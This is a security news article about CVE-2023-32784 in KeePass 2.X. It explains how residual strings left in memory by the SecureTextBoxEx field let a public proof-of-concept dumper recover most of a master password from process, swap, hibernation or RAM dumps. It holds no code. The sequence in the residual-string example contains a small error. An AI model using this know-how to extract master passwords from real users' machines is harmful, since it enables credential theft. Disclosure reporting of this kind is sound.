Critical vulnerability in KeePass exposes master passwords
A researcher known as “vdohney” discovered a critical vulnerability (CVE-2023-32784) in the open-source password manager KeePass.
This vulnerability allows hostile actors to get the master password stored in the software’s memory. Although the vulnerability has not been addressed, a proof-of-concept (PoC) exploitation tool called “KeePass 2.X Master Password Dumper” has been made available.
The issue primarily affects SecureTextBoxEx, KeePass’ customized text box used for entering the master password and additional passwords during editing. The attacker needs access to the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or a RAM dump of the complete system to exploit the bug using the PoC tool.
There is no need for code execution, and the readme claims that the attack works regardless of whether the memory comes from a process dump, RAM dump, hibernation file, or swap file. Vdohney also stated in the GitHub article that it doesn’t matter if the target user’s machine or workspace is shut down, and that the passwords may still be dumped from memory even if KeePass is no longer operating.
KeePass Master Password Dumper is a program that can recover the master password from KeePass’s memory. Except for the initial character, it can retrieve the password in plain text. It functions independent of the memory source, such as a process dump, swap file, hibernation file, or RAM dump. The weakness is caused by the usage of a bespoke password entry box named “SecureTextBoxEx,” which keeps a record of the characters typed in memory.
The exploitable weakness results from the memory construction of residual strings for each character entered. As a result of how .NET works, these strings are exceedingly difficult to remove once they are formed. When the word “Password” is typed, for example, residual strings such as •a, ••s, ••s, •••w, ••••o, •••••r, and •••••d are created. Except for the first character, the PoC program searches the dump for these patterns and offers possible password characters for each spot.
The flaw affects the Windows branch of KeePass 2.X, with potential consequences for Linux and macOS. Fortunately, the problem has been fixed in testing versions of KeePass v2.54, and the official release date is set for July 2023.
The danger of widespread misuse of CVE-2023-32784 remains minimal. Hence, KeepassXC, a fork of KeePassX and a cross-platform implementation of KeePass, is not impacted by this issue.
The sources for this piece include an article in HelpnetSecurity.